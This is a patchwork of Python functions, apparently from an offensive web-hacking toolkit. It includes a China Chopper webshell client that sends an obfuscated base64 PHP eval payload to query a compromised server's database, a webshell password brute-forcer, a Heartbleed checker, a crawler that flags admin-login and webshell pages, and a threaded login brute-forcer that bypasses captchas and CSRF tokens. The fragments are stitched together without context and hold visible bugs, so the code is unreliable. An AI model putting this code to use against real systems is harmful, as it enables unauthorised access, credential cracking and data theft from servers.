def query(queryString):
global mode
global httpHeaderContent
global dbHost, dbUser, dbPass, dbName, postData, url, chopperPass
if mode == 1:
postData[
'z0'] = "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejEiXSk6JF9QT1NUWyJ6MSJdOyR1c3I9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejIiXSk6JF9QT1NUWyJ6MiJdOyRwd2Q9JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejMiXSk6JF9QT1NUWyJ6MyJdOyRkYm49JG0/c3RyaXBzbGFzaGVzKCRfUE9TVFsiejQiXSk6JF9QT1NUWyJ6NCJdOyRzcWw9YmFzZTY0X2RlY29kZSgkX1BPU1RbIno1Il0pOyRUPUBteXNxbF9jb25uZWN0KCRoc3QsJHVzciwkcHdkKTtAbXlzcWxfcXVlcnkoIlNFVCBOQU1FUyB1dGY4Iik7QG15c3FsX3NlbGVjdF9kYigkZGJuKTskcT1AbXlzcWxfcXVlcnkoJHNxbCk7JGk9MDt3aGlsZSgkY29sPUBteXNxbF9maWVsZF9uYW1lKCRxLCRpKSl7ZWNobygkY29sLiJcdHxcdCIpOyRpKys7fWVjaG8oIlxyXG4iKTt3aGlsZSgkcnM9QG15c3FsX2ZldGNoX3JvdygkcSkpe2ZvcigkYz0wOyRjPCRpOyRjKyspe2VjaG8odHJpbSgkcnNbJGNdKSk7ZWNobygiXHR8XHQiKTt9ZWNobygiXHJcbiIpO31AbXlzcWxfY2xvc2UoJFQpOztlY2hvKCJ8PC0iKTtkaWUoKTs="
postData['z1'] = dbHost
postData['z2'] = dbUser
postData['z3'] = dbPass
postData['z4'] = dbName
postData[
chopperPass] = "$xx=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval($xx($yy[z0]));"
httpHeaderContent = get_random_header()
httpHeaderContent['Referer'] = get_http_domain_from_url(url)
httpHeaderContent['Content-Type'] = "application/x-www-form-urlencoded"
else:
postData["z4"] = dbName
postData["z5"] = base64.b64encode(queryString.encode(encoding="utf-8"))
result = post_requests(url, data=postData, headers=httpHeaderContent)
html = result.content.decode("utf8")
return html[3:-3]
def targets(request):
targetValue = request.GET.get('targetValue')
action = request.GET.get('action')
if targetValue != None:
print(targetValue)
if action == "query":
result1 = execute_sql_in_db(
"select http_domain from %s" % first_targets_table_name, db_name)
RESULT1 = ""
if len(result1) != 0:
for each in result1:
RESULT1 += each[0] + "\n"
else:
RESULT1 = "None\n"
result2 = execute_sql_in_db(
"select http_domain from %s" % targets_table_name, db_name)
RESULT2 = ""
if len(result2) != 0:
for each in result2:
RESULT2 += each[0] + "\n"
else:
RESULT2 = "None\n"
string = "first targets:\n" + RESULT1 + "\n" + "targets:\n" + RESULT2
string = string.replace("\n", "<br>")
return HttpResponse(string)
elif action == "add":
targetValue = get_http_domain_from_url(targetValue)
execute_sql_in_db(
"insert into %s(http_domain,domain) values('%s','%s')" %
(targets_table_name, targetValue, targetValue.split("/")[-1]),
db_name)
string = "add new target %s for scan successully:D" % targetValue
return HttpResponse(string)
elif action == "delete":
targetValue = get_http_domain_from_url(targetValue)
execute_sql_in_db(
"DELETE FROM `%s` WHERE http_domain='%s'" %
(targets_table_name, targetValue), db_name)
string = "delete target %s from db successully:D" % targetValue
return HttpResponse(string)
else:
print("normal visit without action request to targets.html")
pass
# 下面这句不能少,下面这句是作为没有action[query/add/delete]查询时的正常情况下的显示页面的处理情况
return render(request, "targets.html", {})
def crack_webshell(url, anyway=1):
# webshll爆破,第二个参数默认为0,如果设置不为0,则不考虑判断是否是webshll,如果设置为1,直接按direct_bao方式爆破
# 如果设置为2,直接按biaodan_bao方式爆破
figlet2file("cracking webshell", 0, True)
print("cracking webshell --> %s" % url)
print("正在使用吃奶的劲爆破...")
ext = get_webshell_suffix_type(url)
tmp = check_webshell_url(url)
url_http_domain = get_http_domain_from_url(url)
if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao':
pass
if anyway == 1 or tmp['y2'] == "direct_bao":
return_value = crack_ext_direct_webshell_url(
url, ModulePath + "dicts/webshell_passwords.txt", ext)
if return_value['cracked'] == 0:
print("webshell爆破失败 :(")
return ""
else:
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应非urls表
# 中的cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
elif anyway == 2 or tmp['y2'] == "biaodan_bao":
pass
'''
return_value = crack_allext_biaodan_webshell_url(
url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt")
if return_value['cracked'] == 0:
print("webshell爆破失败 :(")
return ""
else:
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的
# cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
'''
elif tmp['y2'] == "bypass":
print(
Fore.RED +
"congratulations!!! webshell may found and has no password!!!")
string = "cracked webshell:%s no password!!!" % url
print(Fore.RED + string)
# 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的
# cracked_webshell_urls_info字段中
strings_to_write = "webshell:%s,password:%s" % (
url, return_value['password'])
else:
strings_to_write = "这不是一个webshell :("
return strings_to_write
import sys
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput
from exp10it import get_target_table_name_list
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)
open_port_list = get_target_open_port_list(target)
http_domain = get_http_domain_from_url(target)
hostname = urlparse(target).hostname
target_table_name = get_target_table_name_list(target)[0]
parsed = urlparse(target)
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
open_port_list.append(parsed.netloc.split(":")[1])
for each in open_port_list:
if each not in COMMON_NOT_WEB_PORT_LIST:
a = get_string_from_command("cd %s && python2 ssltest.py -p %s %s " %
(current_dir, each, hostname))
if re.search(r"server is vulnerable", a, re.I):
string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
hostname, each)
CLIOutput().good_print(string_to_write)
def parse_get(self, response):
#input(44444444444444)
item = CrawlerItem()
item['code'] = response.status
item['current_url'] = response.url
#print(response.url)
#input(5555555555555)
#print(response.data)
#input(3333333333)
#if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
# print('fail ....................')
#if response.url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/index.php":
# print('succeed .................')
item['resources_file_list'] = []
item['sub_domains_list'] = []
item['like_admin_login_url'] = False
item['like_webshell_url'] = False
#print(response.text)
if response.status == 200:
urls = collect_urls_from_html(response.text, response.url)
title_list = response.xpath('//title/text()').extract()
item['title'] = None if len(title_list) == 0 else title_list[0]
item['content'] = response.text
else:
a = get_request(response.url, cookie=self.cookie)
item['title'] = a['title']
item['content'] = a['content']
urls = collect_urls_from_html(a['content'], response.url)
#ttt=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name="
#if ttt in urls:
# print(response.url)
# input(333333333333333333)
if like_admin_login_content(item['content']):
item['like_admin_login_url'] == True
if check_url_has_webshell_content(item['current_url'], item['content'],
item['code'], item['title'])['y1']:
item['like_webshell_url'] == True
yield item
url_main_target_domain = get_url_belong_main_target_domain(
self.start_url)
for url in urls:
#if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
# input(1111111111111)
url_templet_list = get_url_templet_list(url)
url_http_domain = get_http_domain_from_url(url)
if url_is_sub_domain_to_http_domain(
url,
urlparse(url)[0] + "://" + url_main_target_domain
) and url_http_domain not in item['sub_domains_list']:
item['sub_domains_list'].append(url_http_domain)
if urlparse(url).hostname != self.domain:
continue
if url in self.collected_urls:
continue
_flag = 0
for _ in url_templet_list:
if _ in self.collected_urls:
_flag = 1
break
if _flag == 1:
continue
self.add_url_templet_to_collected_urls(url)
if "^" in url:
# post类型url
post_url_list = url.split("^")
post_url = post_url_list[0]
post_data = post_url_list[1]
yield SplashRequest(post_url,
callback=self.parse_post,
endpoint='execute',
magic_response=True,
meta={
'handle_httpstatus_all': True,
'current_url': url
},
args={
'lua_source': self.lua_script,
'http_method': 'POST',
'body': post_data
})
else:
# get类型url
#if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
# input(9999999999999999)
match_resource = re.match(RESOURCE_FILE_PATTERN, url)
match_logoff = re.search(
r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I)
if match_resource:
item['resources_file_list'].append(url)
elif match_logoff:
pass
else:
#if url=="http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
# input(8888888889999999999999)
yield SplashRequest(url,
self.parse_get,
endpoint='execute',
magic_response=True,
meta={'handle_httpstatus_all': True},
args={'lua_source': self.lua_script})
def process_item(self, item, spider):
current_url = item['current_url']
parsed = urlparse(current_url)
hostname = parsed.hostname
code = item['code']
title = item['title']
content = item['content']
if "^" in current_url:
pure_url = current_url.split("^")[0]
else:
pure_url = current_url
http_domain = get_http_domain_from_url(current_url)
main_target_domain = get_url_belong_main_target_domain(pure_url)
pang_table_name = main_target_domain.replace(".", "_") + "_pang"
sub_table_name = main_target_domain.replace(".", "_") + "_sub"
target_table_info = get_target_table_name_info(current_url)
if not target_table_info['target_is_pang_or_sub']:
url_start_url = get_url_start_url(pure_url)
url_table_name = get_start_url_urls_table(url_start_url)
else:
url_table_name = get_http_domain_from_url(pure_url).split(
"/")[-1].replace(".", "_") + "_urls"
# 1.write [current_url],[code],[title],[content],[like_admin_login_url],[like_webshell_url] to database
primary_key = "url"
primary_value = current_url
if primary_key == "http://192.168.93.139/dvwa/vulnerabilities/xss_r/?name=?name=?name=?name=?name=":
input(44444444444444444444444)
write_string_to_sql(str(code), DB_NAME, url_table_name, 'code',
primary_key, primary_value)
write_string_to_sql(title, DB_NAME, url_table_name, 'title',
primary_key, primary_value)
write_string_to_sql(content, DB_NAME, url_table_name, 'content',
primary_key, primary_value)
if item['like_admin_login_url']:
write_string_to_sql('1', DB_NAME, url_table_name,
'like_admin_login_url', primary_key,
primary_value)
if item['like_webshell_url']:
write_string_to_sql('1', DB_NAME, url_table_name,
'like_webshell_url', primary_key,
primary_value)
# 2.write [resources_file_list],[like_admin_login_urls] && [like_webshell_urls],[sub_domains_list] to database
# write [resources_file_list]
if target_table_info['target_is_pang_or_sub'] and not target_table_info[
'target_is_pang_and_sub']:
_table_name = pang_table_name if target_table_info[
'target_is_only_pang'] else sub_table_name
_table_name_list = [_table_name]
primary_key = 'http_domain'
primary_value = http_domain
elif target_table_info['target_is_pang_and_sub']:
_table_name_list = [pang_table_name, sub_table_name]
primary_key = 'http_domain'
primary_value = http_domain
elif target_table_info['target_is_main_and_table_is_targets']:
_table_name_list = [TARGETS_TABLE_NAME]
primary_key = 'start_url'
primary_value = url_start_url
elif target_table_info['target_is_main_and_table_is_first_targets']:
_table_name_list = [FIRST_TARGETS_TABLE_NAME]
primary_key = 'start_url'
primary_value = url_start_url
for each in item['resources_file_list']:
for each_table in _table_name_list:
auto_write_string_to_sql(each, DB_NAME, each_table,
"resource_files", primary_key,
primary_value)
# write [like_admin_login_urls] and [like_webshell_urls]
for each_table in _table_name_list:
if item['like_admin_login_url']:
auto_write_string_to_sql(current_url, DB_NAME, each_table,
"like_admin_login_urls", primary_key,
primary_value)
if item['like_webshell_url']:
auto_write_string_to_sql(current_url, DB_NAME, each_table,
"like_webshell_urls", primary_key,
primary_value)
# write [sub_domains_list] to database
if target_table_info['target_is_main']:
if not re.match(r"(\d+\.){3}\d+", hostname):
_result = execute_sql_in_db(
"select http_domain from %s" % sub_table_name, DB_NAME)
exist_sub_domains_list = []
for each in _result:
exist_sub_domains_list.append(each[0])
for each in item['sub_domains_list']:
if each not in exist_sub_domains_list:
# write to database
sql = "insert ignore into `%s`(http_domain,domain) values('%s','%s')" % (
sub_table_name, each, each.split("/")[-1])
execute_sql_in_db(sql, DB_NAME)
# write to config.ini
if not os.path.exists(LOG_FOLDER_PATH):
os.system("mkdir %s" % LOG_FOLDER_PATH)
if not os.path.exists("%s/sub" % LOG_FOLDER_PATH):
os.system("cd %s && mkdir sub" % LOG_FOLDER_PATH)
os.system("echo %s >> %s" %
(each.split("/")[-1], LOG_FOLDER_PATH +
"/sub/" + sub_table_name + ".txt"))
else:
pass
return item
def crack_admin_login_url_thread(url,username,password):
if get_flag[0] == 1:
return
try_time[0] += 1
if requestAction=="GET":
final_request_url=form_action_url
final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
(user_form_name,username),final_request_url)
final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
(pass_form_name,password),final_request_url)
if has_yanzhengma[0]:
if needOnlyGetOneYanZhengMa:
yanzhengmaValue=onlyOneYanZhengMaValue
else:
yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)
final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
(yanzhengma_form_name,yanzhengmaValue),final_request_url)
if hasCsrfToken:
final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)
html=s.get(final_request_url).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
else:
#post request
paramPartValue=form_action_url.split("^")[1]
paramList=paramPartValue.split("&")
values={}
for eachP in paramList:
eachPList=eachP.split("=")
eachparamName=eachPList[0]
eachparamValue=eachPList[1]
if eachparamName==user_form_name:
eachparamValue=username
if eachparamName==pass_form_name:
eachparamValue=password
values[eachparamName]=eachparamValue
if has_yanzhengma[0]:
if not needOnlyGetOneYanZhengMa:
values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
else:
values[yanzhengma_form_name]=onlyOneYanZhengMaValue
if hasCsrfToken:
values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)
html = s.post(form_action_url.split("^")[0], values).text
if hasCsrfToken:
csrfTokenValue=get_csrf_token_value_from_html(html)
currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
USERNAME_PASSWORD = "******" + username + ":" + \
password + ")" + (52 - len(password)) * " "
# 每100次计算完成任务的平均速度
left_time = get_remain_time(
start[0],
biaoji_time[0],
remain_time[0],
100,
try_time[0],
sum[0])
remain_time[0] = left_time
sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
'%' + ' %s/%s remain time:%s %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))
sys.stdout.flush()
if len(html) > logined_least_length:
# 认为登录成功
get_flag[0] = 1
end = time.time()
CLIOutput().good_print(
"congratulations!!! admin login url cracked succeed!!!", "red")
string = "cracked admin login url:%s username and password:(%s:%s)" % (
url, username, password)
CLIOutput().good_print(string, "red")
return_string[0]=string
print("you spend time:" + str(end - start[0]))
http_domain_value = get_http_domain_from_url(url)
# 经验证terminate()应该只能结束当前线程,不能达到结束所有线程
table_name_list = get_target_table_name_list(http_domain_value)
urls_table_name = http_domain_value.split(
"/")[-1].replace(".", "_") + "_urls"
return {'username': username, 'password': password}
